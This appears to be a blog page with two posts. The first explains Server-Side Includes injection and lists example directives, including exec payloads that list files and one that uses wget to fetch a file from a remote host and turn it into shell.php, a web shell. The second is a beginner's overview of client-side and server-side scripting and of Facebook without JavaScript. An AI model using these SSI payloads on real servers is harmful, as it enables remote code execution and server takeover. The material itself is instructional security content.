Server-Side Includes (SSI) Injection

The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields.
SSIs are directives present on Web applications used to feed an HTML page with dynamic contents.
It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives
like: < ! # = / . " - > and [a-zA-Z0-9]

Some examples of Server Side Includes are:

List files of directory:
<!--#exec cmd="ls" -->
Access directories: <!--#exec cmd="cd /root/dir/">
Execution script: <!--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" -->
To change the error message output:
<!--#config errmsg="File not found, informs users and password"-->
To show current document filename: <!--#echo var="DOCUMENT_NAME" -->
To show virtual path and filename: <!--#echo var="DOCUMENT_URI" -->
Using the “config” command and “timefmt” parameter, it is possible to control the date and time output format: <!--#config timefmt="A %B %d %Y %r"-->
Using the “fsize” command, it is possible to print the size of selected file: <!--#fsize file="ssi.shtml" -->

 To observe server side includes vulnerability
click on the below link(you have to create an account to check the vulnerability

observe vulnerability
No comments:

Scriptings -- client side and server side

Server

The Server is responsible for serving the web pages depending on the client/end user requirement. It can be either static or dynamic.

Client

A client is a party that requests pages from the server and displays them to the end user. In general a client program is a web browser.

Script 

A script is a program or sequence of instructions that is interpreted or carried out by another program rather than by the computer processor.

Server Side Scripting

Server side scripting is used to connect to the databases that reside on the web server.  Server side scripting can access the file system residing at the web server.  Response from a server-side script is slower as compared to a client-side script because the scripts are processed on the remote computer.

Client Side Scripting

Program that execute on client side ,by the web browser instead of server side. Upon request, the necessary files are sent to the user's computer by the web server on which they reside.


Advantages of server side scripting
It does not require the user to download plug-in like Java or Flash (client-side scripting). Your scripts are hidden from view. Users only see the HTML output, even when they view the source.

Working of both sides

  • The user opens his web browser (client side)
  • The user starts browsing
  • The client forwards this request to the server, for accessing their web page.
  • The server then acknowledges the request and replies back to the client program. 
    (An access link to that web page)
  • The client then receives the page source and renders it.
    (Into a viewable/under a stable website)
  • Now the user types into search bar
  • The client then submits data to the server
  • The server processes the data and replies back with a related search result
  • The client again renders it back for the user's view
  • The user gets access to the requested link.


Scripting and Facebook

Facebook is completely dependent on javascript you can verify it by turning it off from browser settings>content management.

Javascript is the only accepted way to do client side programming in a browser. It is a standard of sorts accepted by all browser vendors. 

Do we need Javascript always to run a web site?
No. There was internet (world wide web) before javascript. It used to run on HTML.Documents were linked and you could navigate through the links.

How does Facebook  work with Javascript disabled?
Well all the major web application(web sites) that are built are advised to have a fall back mechanism , when the javascript is disabled. It is among the good practices that must be followed. You never wanna disappoint a customer , even if his/her browser's Javascript is disabled. Also it will help you in SEO. As web crawlers cannot crawl through javascript.

And not all things work with facebook when javascript is disabled.
You wont see any pop ups , no picture preview modals , videos would open on a different page. And the seem less interaction that is offered by facebook is replaced by the age old "Click and wait for the response" method.

No comments:
Subscribe to: Posts (Atom)